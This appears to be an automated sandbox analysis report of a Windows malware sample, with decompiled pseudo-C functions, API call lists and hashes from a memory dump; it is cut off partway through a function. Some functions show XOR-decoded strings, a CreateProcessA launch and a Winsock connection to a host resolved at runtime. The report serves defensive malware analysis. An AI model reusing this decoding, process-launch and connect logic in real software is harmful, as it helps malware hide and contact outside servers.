0x00e94707
0x00000000
0x00e944b2
0x00e944b2
0x00e944b6
0x00e94624
0x00e9463b
0x00e94640
0x00e94643
0x00e94645
0x00e9464b
0x00e9464d
0x00e94650
0x00e94652
0x00e94658
0x00e94658
0x00e9465a
0x00e946e1
0x00e946e1
0x00e94660
0x00e94660
0x00e94662
0x00e94668
0x00e9466b
0x00e9466e
0x00e94674
0x00000000
0x00000000
0x00e94676
0x00e9467a
0x00e946a3
0x00e946a5
0x00e9467c
0x00e9467c
0x00e94680
0x00e94684
0x00e9468b
0x00e94691
0x00000000
0x00e94693
0x00e94693
0x00e94696
0x00e94699
0x00e946a1
0x00000000
0x00000000
0x00000000
0x00000000
0x00e946a1
0x00e94691
0x00e946b0
0x00e946b0
0x00e946b2
0x00e946e0
0x00e946e0
0x00000000
0x00e946b4
0x00e946b4
0x00e946ba
0x00e946bb
0x00e946bc
0x00e946bd
0x00e946c2
0x00e946c8
0x00e946cb
0x00e946cd
0x00e946d6
0x00e946d8
0x00e946cf
0x00e946cf
0x00000000
0x00e946d0
0x00e946cd
0x00000000
0x00e946b2
0x00e946a9
0x00e946ab
0x00e946ae
0x00000000
0x00e946ae
0x00e946e7
0x00e946e7
0x00e946e8
0x00e946eb
0x00e946f1
0x00e946f1
0x00e946fa
0x00e946fc
0x00000000
0x00e946fe
0x00e946fe
0x00e94700
0x00000000
0x00e94702
0x00e94702
0x00e94700
0x00e946fc
0x00000000
0x00e944bc
0x00e944bc
0x00e944c1
0x00000000
0x00e944c7
0x00e944c7
0x00e944cc
0x00000000
0x00e944d2
0x00e944d2
0x00e944d8
0x00e944dd
0x00e944df
0x00e944e6
0x00e944e7
0x00e944e9
0x00000000
0x00000000
0x00e944ef
0x00e944ef
0x00e944f3
0x00e944f9
0x00000000
0x00e944ff
0x00e94501
0x00e94502
0x00e94505
0x00000000
0x00e9450b
0x00e9450b
0x00e94511
0x00e94516
0x00e94520
0x00e94524
0x00e94529
0x00e9452c
0x00e9452e
0x00000000
0x00e94530
0x00e94530
0x00e94532
0x00e94535
0x00e94535
0x00e94538
0x00e9453b
0x00e9453b
0x00e94546
0x00e94548
0x00e9454a
0x00000000
0x00000000
0x00e9454a
0x00000000
0x00e9454c
0x00e9454c
0x00e94552
0x00e94555
0x00e94555
0x00e94563
0x00e9456c
0x00e94571
0x00e94577
0x00e9457a
0x00e9457b
0x00e9457d
0x00e9458b
0x00e9458b
0x00e94592
0x00e945f3
0x00000000
0x00e94594
0x00e94594
0x00e945a2
0x00e945a7
0x00e945aa
0x00e945ac
0x00e94723
0x00e94725
0x00e94726
0x00e94727
0x00e94728
0x00e94729
0x00e9472a
0x00e9472f
0x00e94732
0x00e94733
0x00e9473b
0x00e94742
0x00e94745
0x00e94746
0x00e94749
0x00e9474d
0x00e9474e
0x00e94751
0x00e94761
0x00e94784
0x00e94789
0x00e9478c
0x00e9478e
0x00e94a66
0x00e94a66
0x00000000
0x00e94794
0x00e94794
0x00e94797
0x00e94797
0x00e9479a
0x00e947a0
0x00e947a9
0x00e947ab
0x00e947ae
0x00e947b5
0x00e947b8
0x00e947be
0x00000000
0x00000000
0x00e947c0
0x00e947c4
0x00e947ed
0x00e947ed
0x00e947c6
0x00e947c6
0x00e947ca
0x00e947ce
0x00e947d5
0x00e947db
0x00000000
0x00e947dd
0x00e947dd
0x00e947e0
0x00e947e3
0x00e947eb
0x00000000
0x00000000
0x00000000
0x00000000
0x00e947eb
0x00e947db
0x00e947fa
0x00e947fa
0x00e947fc
0x00e94805
0x00e9480b
0x00e9480e
0x00e9480e
0x00e94811
0x00e94814
0x00e94814
0x00e94824
0x00e94832
0x00e94837
0x00e9483e
0x00e94840
0x00000000
0x00e94846
0x00e9484c
0x00e94859
0x00e94862
0x00e94875
0x00e9487c
0x00e94881
0x00e94884
0x00e94886
0x00e94ae8
0x00e94aee
0x00e94aef
0x00e94af0
0x00e94af1
0x00e94af2
0x00e94af3
0x00e94af8
0x00e94af9
0x00e94aff
0x00e9488c
0x00e9488c
0x00e9489a
0x00e9489d
0x00e948b3
0x00e948ba
0x00e948c0
0x00e9489f
0x00e9489f
0x00e948a7
0x00000000
0x00e948a9
0x00e948a9
0x00e948af
0x00e948af
0x00e948a7
0x00e948c6
0x00e948cd
0x00e948d0
0x00e949f0
0x00e949f3
0x00e94a00
0x00e94a03
0x00e94a0b
0x00e94a0b
0x00e949f5
0x00e949fb
0x00e949fb
0x00e948d6
0x00e948d6
0x00e948dc
0x00e948e4
0x00e948e6
0x00e948e9
0x00e948f2
0x00e948fb
0x00e94901
0x00e94904
0x00e94906
0x00000000
0x00000000
0x00e94908
0x00e9490e
0x00e9490f
0x00e9491a
0x00e94922
0x00e9492a
0x00e9492d
0x00e94930
0x00e94936
0x00e9493c
0x00e94942
0x00e94948
0x00e9494b
0x00000000
0x00000000
0x00e9494d
0x00e94972
0x00e94972
0x00e94975
0x00e94992
0x00e94997
0x00e9499a
0x00e9499c
0x00e949da
0x00e9499e
0x00e9499e
0x00e949a4
0x00e949a9
0x00e949b1
0x00e949b2
0x00e949b2
0x00e949c9
0x00e949d0
0x00e949d3
0x00e949d5
0x00e949d5
0x00e949e0
0x00e949e6
0x00e949e6
0x00e949eb
0x00000000
0x00e949eb
0x00e9494f
0x00e94951
0x00e94956
0x00e9495c
0x00e94965
0x00e9496e
0x00e9496e
0x00000000
0x00e94951
0x00e94a0e
0x00e94a0e
0x00e94a12
0x00e94a1a
0x00e94a20
0x00e94a23
0x00e94a29
0x00e94a2b
0x00e94a79
0x00e94a7f
0x00e94a86
0x00e94a86
0x00e94a8c
0x00e94a90
0x00000000
0x00e94a92
0x00e94a96
0x00e94a9f
0x00e94aab
0x00e94ab9
0x00e94abf
0x00e94ac2
0x00e94ac2
0x00e94a90
0x00e94ad1
0x00e94ad9
0x00e94ae2
0x00e94a2d
0x00e94a33
0x00e94a3d
0x00e94a4f
0x00e94a56
0x00e94a63
0x00000000
0x00e94a63
0x00000000
0x00e94a2b
0x00e94886
0x00e947fe
0x00e94a68
0x00e94a6d
0x00e94a78
0x00e94a78
0x00000000
0x00e947fc
0x00e947f5
0x00e947f7
0x00e947f7
0x00000000
0x00e947f7
0x00e945b2
0x00e945b2
0x00e945b5
0x00e945ba
0x00e9471e
0x00000000
0x00e945c0
0x00e945c2
0x00e945ca
0x00e945d0
0x00e945d1
0x00e945d7
0x00e945d8
0x00e945dd
0x00e945e3
0x00e945e6
0x00e945e8
0x00e945ea
0x00e945eb
0x00e945eb
0x00e945f9
0x00e945f9
0x00e945fc
0x00e945ff
0x00e94601
0x00e94604
0x00e94606
0x00e94606
0x00e94609
0x00e94609
0x00e9460c
0x00e9460f
0x00000000
0x00e94615
0x00e94615
0x00e94617
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00e94617
0x00e9460f
0x00e945ba
0x00e945ac
0x00e9457f
0x00e94581
0x00e94582
0x00e94585
0x00000000
0x00000000
0x00000000
0x00000000
0x00e94585
0x00e9457d
0x00e94505
0x00000000
0x00e944f9
0x00000000
0x00e9461d
0x00e944cc
0x00e944c1
0x00e944b6
0x00e9446f
0x00e9446f
0x00e94471
0x00e94473
0x00e94474
0x00e94475
0x00e94476
0x00e9447b
0x00e9470d
0x00e94712
0x00e9471d
0x00e9471d
0x00e9446d
0x00000000

APIs

Part of subcall function 00E96F1C: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,?,00E9084B,00000002,?,?,?,00E824A9,00000000,0000002C,00E825BB), ref: 00E96F4E

_free.LIBCMT ref: 00E943B6
_free.LIBCMT ref: 00E943CD
_free.LIBCMT ref: 00E943EC
_free.LIBCMT ref: 00E94407
_free.LIBCMT ref: 00E9441E

Strings

F8A/, xrefs: 00E9444F

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$AllocateHeap
String ID: F8A/
API String ID: 3033488037-73971870
Opcode ID: 544ac8473e4a74e54ebefa8dd2080d6161ca09313c03caeba99e8a8d4aa95207
Instruction ID: 90f5b19189db30b888c4a0e80e70c4424e1bb483d39a716dbbcd95b67ebdfae0
Opcode Fuzzy Hash: 544ac8473e4a74e54ebefa8dd2080d6161ca09313c03caeba99e8a8d4aa95207
Instruction Fuzzy Hash: F151AFB2A00704AFDF21DF69DC41B6A77F4FF58724B14556AE819EB290E731DA028B90

Uniqueness

Uniqueness Score: -1.00%

Function 00E94C65, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00E94C65(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t27;
				signed int _t29;
				intOrPtr _t33;
				signed int _t38;
				signed int _t41;
				void* _t46;
				signed int _t50;
				intOrPtr* _t51;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t65;
				signed int _t67;
				signed int _t68;
				signed int _t69;
				signed int* _t70;
				signed int _t74;
				void* _t75;

				_t63 = __edx;
				_v12 = __ecx;
				_t27 =  *__ecx;
				_t70 =  *_t27;
				if(_t70 == 0) {
					L14:
					return _t27 | 0xffffffff;
				}
				_t29 =  *0xea9014; // 0xa413846
				_t50 =  *_t70 ^ _t29;
				_t67 = _t70[1] ^ _t29;
				_t72 = _t70[2] ^ _t29;
				asm("ror edi, cl");
				asm("ror esi, cl");
				asm("ror ebx, cl");
				if(_t67 != _t72) {
					L13:
					 *_t67 = E00E92CB4( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
					_t33 = E00E8B0BF(_t50);
					_t51 = _v12;
					 *((intOrPtr*)( *((intOrPtr*)( *_t51)))) = _t33;
					_t23 = _t67 + 4; // 0x4
					 *((intOrPtr*)( *((intOrPtr*)( *_t51)) + 4)) = E00E8B0BF(_t23);
					 *((intOrPtr*)( *((intOrPtr*)( *_t51)) + 8)) = E00E8B0BF(_t72);
					return 0;
				}
				_t38 = 0x200;
				_t74 = _t72 - _t50 >> 2;
				if(_t74 <= 0x200) {
					_t38 = _t74;
				}
				_t68 = _t38 + _t74;
				if(_t68 == 0) {
					_t68 = 0x20;
				}
				if(_t68 < _t74) {
					L8:
					_t68 = _t74 + 4;
					_v8 = E00E9DE67(_t50, _t68, 4);
					_t27 = E00E964B8(0);
					_t61 = _v8;
					_t75 = _t75 + 0x10;
					if(_t61 == 0) {
						goto L14;
					}
					goto L9;
				} else {
					_v8 = E00E9DE67(_t50, _t68, 4);
					E00E964B8(0);
					_t61 = _v8;
					_t75 = _t75 + 0x10;
					if(_t61 != 0) {
						L9:
						_t50 = _t61;
						_v8 = _t61 + _t74 * 4;
						_t72 = _t61 + _t68 * 4;
						_t41 =  *0xea9014; // 0xa413846
						_t67 = _v8;
						_t62 = _t67;
						_v16 = _t41;
						asm("sbb edx, edx");
						_t65 =  !_t63 & _t61 + _t68 * 0x00000004 - _t67 + 0x00000003 >> 0x00000002;
						if(_t65 == 0) {
							goto L13;
						}
						_t69 = _v16;
						_t46 = 0;
						do {
							_t46 = _t46 + 1;
							 *_t62 = _t69;
							_t62 = _t62 + 4;
						} while (_t46 != _t65);
						_t67 = _v8;
						goto L13;
					}
					goto L8;
				}
			}

0x00e94c65
0x00e94c6f
0x00e94c74
0x00e94c77
0x00e94c7b
0x00e94d86
0x00000000
0x00e94d86
0x00e94c81
0x00e94c90
0x00e94c95
0x00e94c97
0x00e94c99
0x00e94c9b
0x00e94c9d
0x00e94ca1
0x00e94d44
0x00e94d52
0x00e94d54
0x00e94d59
0x00e94d60
0x00e94d62
0x00e94d70
0x00e94d7f
0x00000000
0x00e94d82
0x00e94ca9
0x00e94cae
0x00e94cb3
0x00e94cb5
0x00e94cb5
0x00e94cb7
0x00e94cbc
0x00e94cc0
0x00e94cc0
0x00e94cc3
0x00e94ce2
0x00e94ce4
0x00e94cf0
0x00e94cf3
0x00e94cf8
0x00e94cfb
0x00e94d00
0x00000000
0x00000000
0x00000000
0x00e94cc5
0x00e94cd0
0x00e94cd3
0x00e94cd8
0x00e94cdb
0x00e94ce0
0x00e94d06
0x00e94d09
0x00e94d0b
0x00e94d0e
0x00e94d11
0x00e94d16
0x00e94d19
0x00e94d1b
0x00e94d2a
0x00e94d2e
0x00e94d30
0x00000000
0x00000000
0x00e94d32
0x00e94d35
0x00e94d37
0x00e94d37
0x00e94d38
0x00e94d3a
0x00e94d3d
0x00e94d41
0x00000000
0x00e94d41
0x00000000
0x00e94ce0

APIs

_free.LIBCMT ref: 00E94CD3
_free.LIBCMT ref: 00E94CF3
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00E94D54
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00E94D66
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00E94D73

Strings

F8A/, xrefs: 00E94C81, 00E94D11

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: __crt_fast_encode_pointer$_free
String ID: F8A/
API String ID: 366466260-73971870
Opcode ID: a93186bcbde0f2a39548ade7dcc4c1ad3b90c7c8559cb3b8e559ec0ac7b545b9
Instruction ID: 68a05d54d0b002fc00e7f2bf683376aed888c07b3379e86fea0d02720a6799d0
Opcode Fuzzy Hash: a93186bcbde0f2a39548ade7dcc4c1ad3b90c7c8559cb3b8e559ec0ac7b545b9
Instruction Fuzzy Hash: DD41C376A002049FCF20DF78C880A6EB3F6EF89714B2555A8E515FB381DB31AD02CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00E856CF, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 100
processCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00E856CF(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v9;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v36;
				char _v40;
				struct _PROCESS_INFORMATION _v56;
				struct _STARTUPINFOA _v132;
				signed int _t29;
				void _t34;
				void _t35;
				void* _t38;
				CHAR* _t48;
				void* _t50;
				signed int _t52;
				struct _SECURITY_ATTRIBUTES* _t57;
				void* _t60;
				signed int _t61;
				void* _t64;
				void* _t71;
				long _t72;
				signed int _t73;

				_t29 =  *0xea9014; // 0xa413846
				_v8 = _t29 ^ _t73;
				_t48 = E00E909A2();
				__imp__SHGetFolderPathA(0, 0x26, 0, 0, _t48, 0x104);
				asm("movaps xmm0, [0xe7ddf0]");
				_t50 = 0;
				asm("movups [ebp-0x24], xmm0");
				asm("movaps xmm0, [0xe7daa0]");
				asm("movups [ebp-0x14], xmm0");
				do {
					_t2 = _t50 + 0x40; // 0x40
					 *(_t73 + _t50 - 0x24) =  *(_t73 + _t50 - 0x24) ^ _t2;
					_t50 = _t50 + 1;
				} while (_t50 < 0x1f);
				_t60 =  &_v40;
				_v9 = 0;
				_t71 = _t60;
				do {
					_t34 =  *_t60;
					_t60 = _t60 + 1;
				} while (_t34 != 0);
				_t61 = _t60 - _t71;
				_t9 = _t48 - 1; // -1
				_t64 = _t9;
				do {
					_t35 =  *(_t64 + 1);
					_t64 = _t64 + 1;
				} while (_t35 != 0);
				_t52 = _t61 >> 2;
				memcpy(_t64, _t71, _t52 << 2);
				_t55 = _t61 & 0x00000003;
				_t38 = memcpy(_t71 + _t52 + _t52, _t71, _t61 & 0x00000003);
				_t72 = 0x44;
				E00E8D0F0(_t71 + (_t61 & 0x00000003) + _t55, _t38, 0, _t72);
				asm("movaps xmm0, [0xe7dc80]");
				_v132.cb = _t72;
				asm("stosd");
				_v132.lpDesktop = 0xea99c0;
				asm("movups [ebp-0x20], xmm0");
				_v20 = 0x2b377c70;
				_t57 = 0;
				asm("stosd");
				_v16 = 0x31303a20;
				_v12 = 0;
				asm("stosd");
				asm("stosd");
				do {
					_t19 = _t57 + 0x40; // 0x40
					 *(_t73 + _t57 - 0x20) =  *(_t73 + _t57 - 0x20) ^ _t19;
					_t57 =  &(_t57->nLength);
				} while (_t57 < 0x18);
				_v12 = 0;
				CreateProcessA(_t48,  &_v36, 0, 0, 0, 0, 0, 0,  &_v132,  &_v56);
				return E00E8AE43(_v8 ^ _t73);
			}

0x00e856d8
0x00e856df
0x00e856f0
0x00e856fa
0x00e85700
0x00e85707
0x00e85709
0x00e8570d
0x00e85714
0x00e85718
0x00e85718
0x00e8571b
0x00e8571f
0x00e85720
0x00e85725
0x00e85728
0x00e8572c
0x00e8572e
0x00e8572e
0x00e85730
0x00e85731
0x00e85735
0x00e85737
0x00e85737
0x00e8573a
0x00e8573a
0x00e8573d
0x00e8573e
0x00e85747
0x00e8574a
0x00e8574e
0x00e85753
0x00e85755
0x00e8575a
0x00e8575f
0x00e8576b
0x00e8576e
0x00e85774
0x00e8577b
0x00e8577f
0x00e85786
0x00e85788
0x00e85789
0x00e85790
0x00e85793
0x00e85794
0x00e85795
0x00e85795
0x00e85798
0x00e8579c
0x00e8579d
0x00e857a5
0x00e857b8
0x00e857cc

APIs

SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,00000000), ref: 00E856FA
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00E857B8

Strings

:01, xrefs: 00E85789
F8A/, xrefs: 00E856D8
Tett, xrefs: 00E85774
p|7+, xrefs: 00E8577F

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFolderPathProcess
String ID: :01$F8A/$Tett$p|7+
API String ID: 3403665443-4214900561
Opcode ID: 41a8a8724b4b9d9b40ae59a00d37b89a3f3d95ccf380738ad6b32373c9474710
Instruction ID: 8c5cfa35dbcb553e51906a24114039bd084cf422f7e446e976033a63ff8c8e34
Opcode Fuzzy Hash: 41a8a8724b4b9d9b40ae59a00d37b89a3f3d95ccf380738ad6b32373c9474710
Instruction Fuzzy Hash: 15313621904248AEEF00DB78DC44AEEBBF9FF8D304F108159E54576052EB311A49C760

Uniqueness

Uniqueness Score: -1.00%

Function 00E9D89C, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E9D89C(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0xeaa8e8 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0xe76b48 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E00E963DD(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E00E963DD(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x00e9d8a5
0x00e9d94f
0x00e9d8ad
0x00e9d8af
0x00e9d8b6
0x00e9d8b8
0x00e9d8be
0x00e9d8cb
0x00e9d8e0
0x00e9d8e4
0x00e9d936
0x00e9d936
0x00e9d93b
0x00e9d93f
0x00e9d942
0x00e9d942
0x00e9d948
0x00e9d94a
0x00e9d961
0x00e9d95a
0x00e9d960
0x00e9d960
0x00e9d94c
0x00e9d94c
0x00000000
0x00e9d94c
0x00e9d8e6
0x00e9d8ef
0x00e9d926
0x00e9d926
0x00e9d928
0x00e9d92a
0x00000000
0x00000000
0x00e9d932
0x00000000
0x00e9d932
0x00e9d8f9
0x00e9d8fe
0x00e9d903
0x00000000
0x00000000
0x00e9d90d
0x00e9d912
0x00e9d917
0x00000000
0x00000000
0x00e9d91c
0x00e9d922
0x00000000
0x00e9d922
0x00e9d8c3
0x00000000
0x00000000
0x00000000
0x00e9d8c9
0x00e9d958
0x00000000

Strings

ext-ms-, xrefs: 00E9D907
api-ms-, xrefs: 00E9D8F3

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 08cc7e7193db0ac1c71574c43c61dc3382e15bd2485eef487c1b391087259974
Instruction ID: 8fc6522f2f3d04e7b9b419ee6c149bc6b3f1b589797e759c3dc46e4bf8cb90da
Opcode Fuzzy Hash: 08cc7e7193db0ac1c71574c43c61dc3382e15bd2485eef487c1b391087259974
Instruction Fuzzy Hash: 3F21D531A0D330ABCF32AA259C44A6A7798DBD67B4F242160ED49B7391D6B0ED0086E0

Uniqueness

Uniqueness Score: -1.00%

Function 00E9BC56, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E9BC56(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E00E9B9A0(_t45, 7);
					E00E9B9A0(_t45 + 0x1c, 7);
					E00E9B9A0(_t45 + 0x38, 0xc);
					E00E9B9A0(_t45 + 0x68, 0xc);
					E00E9B9A0(_t45 + 0x98, 2);
					E00E964B8( *((intOrPtr*)(_t45 + 0xa0)));
					E00E964B8( *((intOrPtr*)(_t45 + 0xa4)));
					E00E964B8( *((intOrPtr*)(_t45 + 0xa8)));
					E00E9B9A0(_t45 + 0xb4, 7);
					E00E9B9A0(_t45 + 0xd0, 7);
					E00E9B9A0(_t45 + 0xec, 0xc);
					E00E9B9A0(_t45 + 0x11c, 0xc);
					E00E9B9A0(_t45 + 0x14c, 2);
					E00E964B8( *((intOrPtr*)(_t45 + 0x154)));
					E00E964B8( *((intOrPtr*)(_t45 + 0x158)));
					E00E964B8( *((intOrPtr*)(_t45 + 0x15c)));
					return E00E964B8( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x00e9bc5c
0x00e9bc61
0x00e9bc6a
0x00e9bc75
0x00e9bc80
0x00e9bc8b
0x00e9bc99
0x00e9bca4
0x00e9bcaf
0x00e9bcba
0x00e9bcc8
0x00e9bcd6
0x00e9bce7
0x00e9bcf5
0x00e9bd03
0x00e9bd0e
0x00e9bd19
0x00e9bd24
0x00000000
0x00e9bd34
0x00e9bd39

APIs

Part of subcall function 00E9B9A0: _free.LIBCMT ref: 00E9B9C5

_free.LIBCMT ref: 00E9BCA4

Part of subcall function 00E964B8: RtlFreeHeap.NTDLL(00000000,00000000,?,00E9B9CA,?,00000000,?,00000002,?,00E9BC6F,?,00000007,?,?,00E9C2E4,?), ref: 00E964CE
Part of subcall function 00E964B8: GetLastError.KERNEL32(?,?,00E9B9CA,?,00000000,?,00000002,?,00E9BC6F,?,00000007,?,?,00E9C2E4,?,?), ref: 00E964E0

_free.LIBCMT ref: 00E9BCAF
_free.LIBCMT ref: 00E9BCBA
_free.LIBCMT ref: 00E9BD0E
_free.LIBCMT ref: 00E9BD19
_free.LIBCMT ref: 00E9BD24
_free.LIBCMT ref: 00E9BD2F

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ad1b06e11366af490d37ed3c7e7652c03bfb021593f371a598e2c90364fcba2b
Instruction ID: 653f7a38db8f8a1387a9d88bb33fa4f7e00021456425e62e4193f921f64d4eaf
Opcode Fuzzy Hash: ad1b06e11366af490d37ed3c7e7652c03bfb021593f371a598e2c90364fcba2b
Instruction Fuzzy Hash: 30112171550B08BADD20BBB0DD07FCB77DC6F44B00F805815B7ADB6052DB79B5054662

Uniqueness

Uniqueness Score: -1.00%

Function 00E846F7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 56networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00E84718
socket.WS2_32(00000002,00000001,00000000), ref: 00E84729
gethostbyname.WS2_32(00EAAD28), ref: 00E8473B
htons.WS2_32(00000000), ref: 00E84763
connect.WS2_32(00000000,?,00000010), ref: 00E84774

Strings

F8A/, xrefs: 00E84700

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: Startupconnectgethostbynamehtonssocket
String ID: F8A/
API String ID: 2405761414-73971870
Opcode ID: e38b264d5adadfeab305a29c46cadca3d121ffe445305882cfad7092ba2710cd
Instruction ID: 5630acc85333cd4b64f21fe3f1db1467529f65ebcf0f7e728594bf4233bf75e1
Opcode Fuzzy Hash: e38b264d5adadfeab305a29c46cadca3d121ffe445305882cfad7092ba2710cd
Instruction Fuzzy Hash: FB11C6B0600215AFD710EB699C49EBF77FCEF0A715F05012AF849F61A0D770A948C765

Uniqueness

Uniqueness Score: -1.00%

Function 00E897E3, Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00E897E3(void* __ebx, intOrPtr* __ecx, void* __edi, CHAR* __esi, void* __ebp) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v22;
				short _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				void _v44;
				signed int _t21;
				intOrPtr _t25;
				CHAR* _t32;
				intOrPtr _t36;
				intOrPtr* _t38;
				signed int _t40;
				void* _t42;
				intOrPtr _t53;
				intOrPtr* _t54;
				void* _t62;
				signed int _t67;
				signed int _t68;

				_t63 = __esi;
				_t67 =  &_v44;
				_t21 =  *0xea9014; // 0xa413846
				_v8 = _t21 ^ _t67;
				_t38 = __ecx;
				if( *0xeaafb8 == 0) {
					E00E8A313(__ecx, __esi, 0xeaae90);
					asm("movaps xmm0, [0xe7dde0]");
					_push(0xeaae90);
					asm("movups [esp+0x18], xmm0");
					_v28 = 0;
					_t32 = E00E82846( &_v44);
					_t63 = 0xeaaeb8;
					wsprintfA(0xeaaeb8, _t32);
					_t67 = _t67 + 0xc;
					_v36 = 0x21362e22;
					_t5 =  &_v36; // 0x21362e22
					_v32 = 0x693c3c2b;
					_v28 = 0x22262727;
					_v24 = 0x2822;
					_v22 = 0;
					 *0xeaafc4 = E00E827F5(_t5);
					 *0xeaafc0 = 0x50;
					 *0xeaafc8 = 0xeaaeb8;
					 *0xeaafbc = 1;
					E00E887BF(_t38, 0xeaafbc, 0xeaae90, 0xeaaeb8, 0xeaafbc);
					_t53 =  *0xeaafd4; // 0x0
					_t36 =  *0xeaafd8; // 0x0
					 *0xeaafb8 = _t53;
					 *((char*)(_t36 + _t53)) = 0;
				}
				E00E8A313(_t38, _t63, 0xeaae90);
				_t54 = _t38;
				_t40 = 8;
				memcpy( &_v44, 0xeaafbc, _t40 << 2);
				_t68 = _t67 + 0xc;
				_t62 = 0xeaafbc + _t40 + _t40;
				_v28 = _t38;
				_t14 = _t54 + 1; // 0x1
